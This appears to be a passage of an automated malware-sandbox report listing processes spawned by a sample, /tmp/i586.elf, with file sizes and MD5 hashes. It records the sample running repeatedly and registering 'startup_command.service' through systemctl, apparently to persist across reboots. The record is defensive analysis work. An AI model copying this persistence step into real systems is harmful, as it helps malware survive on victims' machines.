                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:52:39
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:52:43
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:52:49
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:52:49
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:52:54
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:52:58
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:52:59
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:52:59
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:09
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:09
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:13
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:19
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:19
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:24
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:24
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:29
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:29
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:39
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:43
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:44
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:44
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:49
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:53:49
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/bin/sh
                                                                                  Arguments:sh -c "systemctl daemon-reload"
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/bin/sh
                                                                                  Arguments:-
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/bin/systemctl
                                                                                  Arguments:systemctl daemon-reload
                                                                                  File size:996584 bytes
                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/tmp/i586.elf
                                                                                  Arguments:-
                                                                                  File size:70796 bytes
                                                                                  MD5 hash:a4308d0cf09d2f1bc259627e7b91252d

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/bin/sh
                                                                                  Arguments:sh -c "systemctl enable startup_command.service"
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):07:51:48
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/bin/sh
                                                                                  Arguments:-
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):07:51:48
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/bin/systemctl
                                                                                  Arguments:systemctl enable startup_command.service
                                                                                  File size:996584 bytes
                                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/lib/systemd/systemd
                                                                                  Arguments:-
                                                                                  File size:1620224 bytes
                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                  Start time (UTC):07:51:47
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                  File size:22760 bytes
                                                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                  Start time (UTC):07:51:48
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/lib/systemd/systemd
                                                                                  Arguments:-
                                                                                  File size:1620224 bytes
                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                  Start time (UTC):07:51:48
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                  File size:22760 bytes
                                                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                  Start time (UTC):07:51:49
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/libexec/gnome-session-binary
                                                                                  Arguments:-
                                                                                  File size:334664 bytes
                                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                  Start time (UTC):07:51:49
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/bin/sh
                                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):07:51:49
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/libexec/gsd-rfkill
                                                                                  Arguments:/usr/libexec/gsd-rfkill
                                                                                  File size:51808 bytes
                                                                                  MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                                                                  Start time (UTC):07:51:51
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/lib/systemd/systemd
                                                                                  Arguments:-
                                                                                  File size:1620224 bytes
                                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                  Start time (UTC):07:51:51
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/lib/systemd/systemd-hostnamed
                                                                                  Arguments:/lib/systemd/systemd-hostnamed
                                                                                  File size:35040 bytes
                                                                                  MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                                                                  Start time (UTC):07:51:51
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/sbin/gdm3
                                                                                  Arguments:-
                                                                                  File size:453296 bytes
                                                                                  MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                  Start time (UTC):07:51:51
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/etc/gdm3/PrimeOff/Default
                                                                                  Arguments:/etc/gdm3/PrimeOff/Default
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                  Start time (UTC):07:51:51
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/usr/sbin/gdm3
                                                                                  Arguments:-
                                                                                  File size:453296 bytes
                                                                                  MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                  Start time (UTC):07:51:51
                                                                                  Start date (UTC):02/01/2025
                                                                                  Path:/etc/gdm3/PrimeOff/Default
                                                                                  Arguments:/etc/gdm3/PrimeOff/Default
                                                                                  File size:129816 bytes
                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c